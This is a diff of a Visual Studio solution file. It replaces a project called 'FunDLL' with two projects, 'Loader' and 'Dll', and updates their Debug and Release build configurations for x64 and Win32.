-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "FunDLL", "FunDLL\FunDLL.vcxproj", "{C7E129B4-8A7E-4E5C-A259-573609675FED}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{81F05638-72B8-41DA-B80A-4F292961D9A1}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll", "Dll\Dll.vcxproj", "{0299D361-D3F7-419A-AB93-FB36642C97FA}"
 EndProject
 Global
 GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -23,14 +25,22 @@ Global
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x64.Build.0 = Release|x64
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.ActiveCfg = Release|Win32
 {9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.Build.0 = Release|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32
- {C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.ActiveCfg = Debug|x64
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.Build.0 = Debug|x64
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.ActiveCfg = Debug|Win32
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.Build.0 = Debug|Win32
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.ActiveCfg = Release|x64
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.Build.0 = Release|x64
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.ActiveCfg = Release|Win32
+ {81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.Build.0 = Release|Win32
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.ActiveCfg = Debug|x64
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.Build.0 = Debug|x64
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.ActiveCfg = Debug|Win32
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.Build.0 = Debug|Win32
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.ActiveCfg = Release|x64
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.Build.0 = Release|x64
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.ActiveCfg = Release|Win32
+ {0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.Build.0 = Release|Win32
 EndGlobalSection
 GlobalSection(SolutionProperties) = preSolution
 HideSolutionNode = FALSE